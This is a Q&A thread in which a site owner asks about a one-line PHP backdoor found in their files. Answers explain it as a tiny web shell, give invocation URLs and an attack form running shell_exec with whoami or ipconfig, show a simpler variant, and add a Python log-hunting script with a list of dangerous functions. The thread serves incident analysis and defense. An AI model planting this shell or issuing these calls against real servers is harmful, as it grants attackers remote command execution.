Question

I found a line of script left by the hacker in one of my PHP files. And it reads like this:

<?php

($_=@$_GET[2]).@$_($_POST[1]);

?>

Can anyone please give some hints about what this line of code does? Thank you.


Solution 2

As Reeno already said in a comment, it's like a PHP shell.

Explanation

  • Store the GET variable with the key '2' in a variable called $_. Due to PHP's nature of weak typing, we do not need quotes around the number.

    $_=@$_GET[2]
    
  • Treat $_ as a callable function name and execute it with $_POST[1] as the first argument.

    @$_($_POST[1])
    

The @ operators should suppress error logging, see PHP.net: Error Control Operators.

The concatenation operator between the two statements actually does nothing important. It could be rewritten like this:

$_=@$_GET[2];
@$_($_POST[1]);

Use case

Calling arbitrary functions. I won't mention the specific HTTP headers for a successful attack, but this should be fairly easy for every (web) programmer.

OTHER TIPS

I already posted it as a comment since the question was on hold, here now as an answer:

It's a PHP shell. If you rewrite it to <?php ($_=@$_GET[2]).@$_($_GET[1]); ?> the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.

You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.

Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.

/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.
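The log search that the /edit above suggests, written out as an added example (it is not part of the original answers): a Python script that parses Apache/nginx "combined" access-log lines, url-decodes each query parameter and flags requests in which any parameter value is the name of a PHP function that runs shell commands or evaluates code. It goes beyond the `egrep "(&|\?)2=.+"` one-liner in two ways: it does not care what the parameter is called (so it also catches the `c=shell_exec` variant of the same backdoor), and it ignores harmless hits such as a legitimate parameter named `2` or a search for "system requirements". PHP function names are case-insensitive, so the comparison is done in lower case. The log lines, the list of dangerous functions and the field names are constructed for this example; only the GET half of each call is visible, because the POST body is not written to the access log.

```python
"""Hunt for uses of a "variable function" PHP backdoor in access logs.

Added example, not code from the original answers. The sample log lines are
constructed; the DANGEROUS_FUNCTIONS list is an assumption and not exhaustive.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# PHP functions an attacker would name in the GET parameter so that
# $_($_POST[1]) runs a command or evaluates code. Assumed list, extend as needed.
DANGEROUS_FUNCTIONS = frozenset({
    "shell_exec", "system", "passthru", "exec", "popen", "proc_open",
    "pcntl_exec", "assert", "create_function", "call_user_func",
    "call_user_func_array", "file_put_contents", "file_get_contents",
})

# "combined" log format: client ident user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample log: four backdoor calls, three harmless requests.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2013:13:55:36 +0200] "POST /uploads/file.php?2=shell_exec HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2013:13:56:01 +0200] "GET /uploads/file.php?2=shell_exec&1=whoami HTTP/1.1" 200 48 "-" "curl/7.30"
198.51.100.4 - - [10/Oct/2013:14:02:10 +0200] "GET /page.php?c=SHELL_EXEC&p=id HTTP/1.1" 200 60 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Oct/2013:14:05:00 +0200] "GET /blog/?p=2&page=2 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Oct/2013:14:06:00 +0200] "GET /search.php?q=system%20requirements HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Oct/2013:14:07:00 +0200] "GET /gallery.php?2=large HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2013:14:09:30 +0200] "GET /uploads/file.php?2=shell%5Fexec&1=ls HTTP/1.1" 200 96 "-" "curl/7.30"
"""


def parse_line(line):
    """Split one combined-format log line into its fields, or return None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parts.query
    return rec


def suspicious_params(query):
    """Return (name, value) pairs whose decoded value names a dangerous function.

    parse_qsl url-decodes, so "shell%5Fexec" is seen as "shell_exec"; the
    lower-case comparison mirrors PHP's case-insensitive function names.
    """
    return [
        (name, value)
        for name, value in parse_qsl(query, keep_blank_values=True)
        if value.strip().lower() in DANGEROUS_FUNCTIONS
    ]


def hunt(lines):
    """Return one record per request that looks like a backdoor invocation."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        params = suspicious_params(rec["query"])
        if not params:
            continue
        hits.append({
            "client": rec["client"],
            "time": rec["time"],
            "method": rec["method"],
            "path": rec["path"],
            "params": params,
            # Everything else in the query: for the all-GET variant this is
            # the command; for the GET+POST variant the argument is not logged.
            "other_params": [
                (n, v) for n, v in parse_qsl(rec["query"], keep_blank_values=True)
                if (n, v) not in params
            ],
        })
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG.splitlines()):
        print(f'{hit["time"]} {hit["client"]} {hit["method"]} {hit["path"]} '
              f'function={hit["params"]} visible_args={hit["other_params"]}')
```

Run it against your real logs with `hunt(open("access.log").readlines())`; a hit whose `method` is `POST` and whose `other_params` is empty matches the GET+POST form of the backdoor in the question, where the command itself never reaches the log.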

First of all, you must remove those lines as soon as possible.

This code is used to call PHP functions. To give you an example, your hacker will use this kind of form:

<form method="post" action="http://site.com/page.php?2=shell_exec">
    <input name="1" value="ipconfig -all"/>
    <input type="submit" value="Send"/>
</form>

You'll then get these values:

  • $_ = $_GET[2] = shell_exec
  • $_POST[1] = ipconfig -all
  • $_($_POST[1]) = $_("ipconfig -all") = shell_exec("ipconfig -all")

The @ operators are here to disable errors.


A simpler example would be to use this code :

<?= @$_GET['c'](@$_GET['p']); ?>

With a simple call to http://site.com/page.php?c=shell_exec&p=ipconfig%20-all.

Licensed under: CC-BY-SA with attribution